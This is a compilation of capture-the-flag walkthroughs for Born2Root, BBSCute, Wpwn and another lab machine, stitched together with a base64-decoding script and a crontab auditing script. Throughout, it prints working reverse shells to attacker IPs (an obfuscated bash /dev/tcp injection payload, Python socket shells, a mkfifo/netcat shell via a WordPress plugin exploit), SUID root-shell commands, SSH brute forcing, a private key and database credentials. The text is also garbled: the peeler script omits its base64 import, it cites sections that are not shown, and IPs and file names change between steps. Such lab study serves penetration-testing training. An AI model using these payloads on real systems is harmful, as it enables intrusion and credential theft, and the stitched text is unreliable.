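import binascii
import string
from typing import List

# The string recovered from the page source above (page content, used here as input).
PAGE_STRING = "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK"

_PRINTABLE = set(string.printable)


def peel_base64(blob: str, max_layers: int = 16) -> List[str]:
    """Decode repeatedly and return every layer, innermost last.

    Stops when the current text is not valid base64 (validate=True rejects any
    character outside the alphabet, and bad padding), when it is not ASCII, or when
    it contains non-printable bytes, which is the usual sign of binary rather than
    another text layer. max_layers guards against pathological input.
    """
    layers: List[str] = []
    current = blob.strip()
    for _ in range(max_layers):
        try:
            raw = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            break
        if not text or not all(c in _PRINTABLE for c in text):
            break
        current = text.strip()   # each layer on the page ends with a trailing newline
        layers.append(current)
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(peel_base64(PAGE_STRING), start=1):
        print(f"layer {depth}: {layer}")
```

A short plain-text result that happens to be made only of base64 alphabet characters would be decoded one step too far; the printable check catches most such cases, and the full layer list is returned so the reviewer can still see the previous step.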

Browsing to workinginprogress.php:

/workinginprogress.php

Looking at the comment regarding ping we can take a guess for command injection on the current page. Appending ?cmd=(command) generates results.

To create a reverse shell run the following command in a terminal:

echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba"se"6"4 -"d|ba"se"64 -"d|b"a"s"h" | sed 's/ /${IFS}/g'

Then take the base64 output and run it as a command in the web browser.

http://192.168.152.20/workinginprogress.php?cmd=echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE9USXVNVFk0TGpRNUxqRTFNaTg0TUNBd1BpWXhDZz09Cg==|ba%27%27se%27%276%27%274${IFS}-%27%27d|ba%27%27se%27%2764${IFS}-%27%27d|b%27%27a%27%27s%27%27h

This will create a reverse shell connection on our netcat listener.

I then transferred linpeas over from my attacking machine. Running it shows that the binary 'find' has the SUID bit set.

Checking this against GTFOBins shows we can use this to gain a root shell.

Run the following command to spawn a root shell:

/usr/bin/find . -exec /bin/sh -p \; -quit

pg-born2root-play

Exploitation Guide for Born2Root

Summary

Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs.

Enumeration

Nmap

We initiate our enumeration of the target by launching two nmap scans. The first one will identify open ports, and the second one will attempt to discover more information about each service.

kali@kali:~$ sudo nmap 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
kali@kali:~$ sudo nmap -p 22,80,111 -A 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_  256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title:  Secretsec Company 
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          39832/tcp6  status
|   100024  1          47504/udp   status
|   100024  1          50443/udp6  status
|_  100024  1          52205/tcp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

A web server is running on port 80; browsing to it, we find a company web page with general and contact information.

We should take note of the username martin that appears twice on this page: in the About Us section and in the Contact Us section.

GoBuster

We will use GoBuster to do a brute force scan in an attempt to discover any other folders present on the web server using the common.txt wordlist.

kali@kali:~$ locate common.txt
...
/usr/lib/python3/dist-packages/mercurial/helptext/common.txt
/usr/share/dirb/wordlists/common.txt
...
kali@kali:~$ gobuster dir -t 20 -w /usr/share/dirb/wordlists/common.txt --url http://192.168.54.49
...
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/files (Status: 301)
/icons (Status: 301)
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)
...

Gobuster finds a directory named /icons containing a text file VDSoyuAXiO.txt. This file contains an SSH Key. We will download the key and save it to a file.

kali@kali:~$ curl http://192.168.54.49/icons/VDSoyuAXiO.txt >> born
kali@kali:~$ cat born
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
...
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----

Exploitation

Local SSH Access

Let’s give this key proper permissions and then use it to SSH as martin (we can just hit enter when prompted for secret password).

kali@kali:~$ chmod 0600 born
kali@kali:~$ ssh martin@192.168.120.52 -i born 
...

READY TO ACCESS THE SECRET LAB ? 

secret password : 
WELCOME ! 
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groups=1001(martin)

Escalation

Local Enumeration

Checking all the cron jobs scheduled on the system, we find one that runs a readable Python file, /tmp/sekurity.py, as the user jimmy every five minutes:

martin@debian:~$ cat /etc/cron*
...
*/5   * * * *   jimmy   python /tmp/sekurity.py

Reverse Shell

We can copy a Python reverse shell into sekurity.py, make it executable (chmod +x sekurity.py) and wait up to 5 minutes for the cron job to execute it:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.63.200",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

We need to set up a netcat listener on our Kali machine to catch the reverse shell that is going to get executed on the target system.

After a few minutes, we catch our shell:

kali@kali:~$ sudo nc -lvp 80
listening on [any] 80 ...
192.168.54.49: inverse host lookup failed: Unknown host
connect to [192.168.49.54] from (UNKNOWN) [192.168.54.49] 52400
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ python -c 'import pty; pty.spawn("/bin/bash")'
jimmy@debian:~$

SSH Login Brute-Force

Let’s check /etc/passwd to get a list of available users on the system:

jimmy@debian:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash

The user Hadi stands out as another user also mentioned on the company website.

We build a candidate wordlist by grepping rockyou.txt for the string hadi:

kali@kali:~$ cat /usr/share/wordlists/rockyou.txt | grep hadi > /home/kali/hadi.txt

I then used the text file with Hydra to bruteforce SSH, which actually worked.

Now we can try brute-forcing the password for the user hadi using Hydra:

kali@kali:~$ hydra -t 4 -l hadi -P passwords-mutated.txt 192.168.120.52 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-06 09:39:44
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1161 login tries (l:1/p:1161), ~291 tries per task
[DATA] attacking ssh://192.168.120.52:22/
[STATUS] 24.00 tries/min, 24 tries in 00:01h, 1137 to do in 00:48h, 4 active
[STATUS] 26.33 tries/min, 79 tries in 00:03h, 1082 to do in 00:42h, 4 active
[STATUS] 23.43 tries/min, 164 tries in 00:07h, 997 to do in 00:43h, 4 active
[STATUS] 23.67 tries/min, 284 tries in 00:12h, 877 to do in 00:38h, 4 active
[22][ssh] host: 192.168.120.52   login: hadi   password: hadi123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-06 09:52:26


We find that the password is hadi123, and now we simply switch from our current user to hadi with the recovered password:

jimmy@debian:~$ su hadi
...
hadi@debian:/home/jimmy$ id
id
uid=1000(hadi) gid=1000(hadi) groups=1000(hadi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Escalation to Root

The password for root was re-used and is the same as hadi‘s: hadi123.

hadi@debian:~$ su -
Password:
root@debian:~# whoami
root

explained

root@debian:/var/spool/cron# cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py
root@debian:/var/spool/cron#
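The jimmy entry in this crontab is the whole story of the Born2Root escalation: a scheduled job executes a script from /tmp, a directory every local user can write to. The Dawn section earlier on this page is the same defect in a different costume, where a scheduled /bin/sh -c /home/dawn/ITDEPT/web-control ran a file from a writable SMB share. As an added example that is not part of either writeup, the Python below parses a system crontab (the user-field format shown above), pulls the absolute paths out of each command, and flags any that live under a writable location or, when the file exists on the host being audited, are world-writable. The crontab text is a constructed copy of the one above; the set of untrusted prefixes and the treatment of the Dawn share path as an extra untrusted prefix are my assumptions.

```python
import os
import re
import shlex
import stat
from typing import Dict, Iterable, List

# Constructed input: the system crontab shown above.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py
"""

# Locations any local user can write to; a scheduled job must never execute from here.
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")

# System-crontab line: five schedule fields (or @reboot etc.), a user, then the command.
_SYSTEM_CRON = re.compile(
    r"^(?P<sched>@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_system_crontab(text: str) -> List[Dict]:
    """Return the jobs in /etc/crontab or /etc/cron.d format (with the user field)."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        m = _SYSTEM_CRON.match(line)
        if m:
            jobs.append({"schedule": m.group("sched"), "user": m.group("user"),
                         "command": m.group("cmd")})
    return jobs


def referenced_paths(command: str) -> List[str]:
    """Absolute paths mentioned anywhere in the command line."""
    try:
        tokens = shlex.split(command)
    except ValueError:            # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def audit_command(command: str, extra_untrusted: Iterable[str] = ()) -> List[str]:
    """Reasons the command is unsafe to schedule: paths in writable locations, and
    (when the path exists on this host) regular files that are world-writable."""
    reasons = []
    prefixes = UNTRUSTED_PREFIXES + tuple(extra_untrusted)
    for p in referenced_paths(command):
        if p.startswith(prefixes):
            reasons.append(f"{p}: in a location other users can write to")
        try:
            mode = os.stat(p).st_mode
        except OSError:
            continue              # not present here (e.g. auditing a crontab offline)
        if stat.S_ISREG(mode) and mode & stat.S_IWOTH:
            reasons.append(f"{p}: world-writable")
    return reasons


def audit_crontab(text: str, extra_untrusted: Iterable[str] = ()) -> List[Dict]:
    """Jobs whose command references an untrusted path, each with its reasons."""
    flagged = []
    for job in parse_system_crontab(text):
        reasons = audit_command(job["command"], extra_untrusted)
        if reasons:
            flagged.append({**job, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for job in audit_crontab(SAMPLE_CRONTAB):
        print(f"{job['user']:8} {job['schedule']:12} {job['command']}")
        for why in job["reasons"]:
            print(f"    {why}")
    # The Dawn case: the share root is supplied as an extra untrusted prefix (assumed path).
    print(audit_command("/bin/sh -c /home/dawn/ITDEPT/web-control",
                        extra_untrusted=("/home/dawn/ITDEPT/",)))
```

The world-writable check only fires for paths that exist on the machine running the audit, which is why the prefix check comes first: a crontab copied off a box can still be judged offline, and the /tmp reference alone is enough to fail the jimmy job.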
THE RABBIT HOLE

The networker binary is a lie. There isn’t anything in it that is helpful. It doesn’t take any input, it doesn’t open any ports, and the paths are all hard-coded. I’m sure there’s a way to edit the binary to add our own custom shell code to it, but I don’t have my OSCE yet and this is supposed to be an intermediate difficulty VM, so I’m not about to go try and deal with that.

Instead, I’m going to go back to my OSCP training

kali@kali:~$ sudo nc -nlvp 80
Password: 
listening on [any] 80 ...
connect to [192.168.63.200] from (UNKNOWN) [192.168.63.49] 53601
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ ls -la
total 28
drwx------ 2 jimmy jimmy 4096 Jun 9 2017 .
drwxr-xr-x 5 root root 4096 Jun 9 2017 ..
-rw-r--r-- 1 root root 0 Mar 6 2020 .bash_history
-rw-r--r-- 1 jimmy jimmy 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3515 Jun 8 2017 .bashrc
-rw-r--r-- 1 jimmy jimmy 675 Jun 8 2017 .profile
-rwsrwxrwx 1 root root 7496 Jun 9 2017 networker
$ file networker
networker: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=bacc02fa5747f07430f55e0d5e70d4078800c9f5, not stripped
$ strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^_]
*** Networker 2.0 *** 
/sbin/ifconfig
/bin/ping -c 1 localhost 
Done 
echo 'echo linux tool version 5' 
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
crtstuff.c
__JCR_LIST__
--snip--
.dynamic
.got.plt
.data
.bss
.comment
$


pg-bbscute-play

BBSCute

Nmap
sudo nmap 192.168.120.128 -p- -sS -sV
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
88/tcp open http nginx 1.14.2
110/tcp open pop3 Courier pop3d
995/tcp open ssl/pop3 Courier pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to port 80 in the browser lands us on the default install page for Apache.

Running dirsearch.py against the target web servers reveals index.php:

python3 dirsearch.py -u http://192.168.120.128 -w /usr/share/seclists/Discovery/Web-Content/common.txt -r -t 60 --full-url

Index.php takes us to the login page for CuteNews. I tried some default credentials and was unable to access the system.

Instead, we can register ourselves as a new user. On the registration page the captcha image fails to load, which stops us from proceeding:

/index.php?register

Reviewing the source of this page shows we do have a link for captcha.php.

Viewing this will show what the current captcha should be.

/captcha.php

Entering this into the registration field will allow us to proceed with new user creation.

We can see that we are running CuteNews 2.1.2 as per the footer of the page. Searching for exploits with searchsploit shows the results below.

Searching further on Google for exploits we come across a PoC on GitHub located here: https://github.com/CRFSlick/CVE-2019-11447-POC.

Download the python script and the sad.gif files to the same directory. Run with the syntax shown below.

python3 <User> <Pass> http://192.168.120.128/index.php

We can now run the following command to get a more usable reverse shell on a different listener:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.120",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

From here I uploaded linpeas, which after executing identified the binary hping3 as having the SUID bit set, meaning we can execute it with root permissions.

Then, as per GTFOBins, we can use the SUID binary to gain a root shell:

/usr/sbin/hping3
/bin/sh -p
OR
./hping3
/bin/sh -p

pg-wpwn-play

Wpwn

Nmap
sudo nmap 192.168.178.123 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Running curl on port 80 simply shows a basic greeting for the machine by the creator.

With nothing else interesting we move onto directory enumeration with dirsearch.py.

sudo python3 dirsearch.py -u http://192.168.178.123/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --full-url -t 75

With the common.txt wordlists we hit robots.txt and /wordpress. Robots contains no interesting information.

Moving over to the /wordpress directory we get the following page.

/wordpress

Other than this the WordPress site contains no interesting information. From here we can run WPScan in order to try and identify further information.

wpscan --url http://192.168.178.123/wordpress/ --passwords /usr/share/wordlists/rockyou.txt

WPScan picks up the plugin ‘social-warfare’ as being installed and out of date.

Checking this against searchsploit reveals an RCE against the running version:

searchsploit -w social warfare 3.5.2

The vulnerability has been assigned CVE-2019-9978.

Description:

The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

The following GitHub repository provides a PoC for this exploit: hash3liZer/CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2).

As per the GitHub description we need to create a text file that will be hosted on our attacking machine with the contents of what we want to execute.

<pre>system('command')</pre>

First I hosted a Python SimpleHTTPServer on my attacking machine.

sudo python2 -m SimpleHTTPServer 443

I then downloaded the associated Python script and executed it as below:

python2 cve-2019-9978.py --target http://192.168.178.123/wordpress/ --payload-uri http://192.168.49.178:443/test.txt

In the example above the command included in test.txt was 'id'. I then replaced the command with 'which nc' to see whether netcat is on the target machine and ran the exploit again.

As netcat is installed we can replace the command in the test.txt file with that of a netcat reverse shell.

Contents of test.txt:

<pre>system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.178 80 >/tmp/f')</pre>

I then set a netcat listener on my attacking machine:

sudo nc -lvp 80

Running the exploit again hangs the script as we receive a reverse shell.

We then upgrade the shell:

/usr/bin/script -qc /bin/bash /dev/null

Moving back one directory in the shell, we can read wp-config for MySQL database credentials.

We have gathered the credentials wp_user:R3&]vzhHmMn9,:-5. From here I logged into MySQL and took the WordPress administrator’s hash, but was unable to crack it. Looking around the box there is a user ‘takis’; I decided to see if password reuse was in play and SSH in as takis:

ssh takis@192.168.178.123

Now that we are in as takis, I run sudo -l to check sudo permissions.

It looks like we can run all commands as any user without a password. A simple sudo /bin/bash spawns a root shell.